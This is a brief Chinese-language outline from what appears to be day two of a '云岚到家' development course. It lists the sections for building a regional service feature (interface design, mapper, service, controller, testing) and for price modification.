【云岚到家】-day02-1-区域服务后续开发及完善 1 区域服务后续开发1.1 添加区域服务1.1.1 接口定义1.1.1.1 接口设计1.1.1.2 接口定义-json 1.1.2 接口开发1.1.2.1 mapper1.1.2.2 service1.1.2.3 controller 1.1.3 测试 1.2 修改价格1.2.1 接口定义1.2.1.1 接口设计1.2.1.2 接口…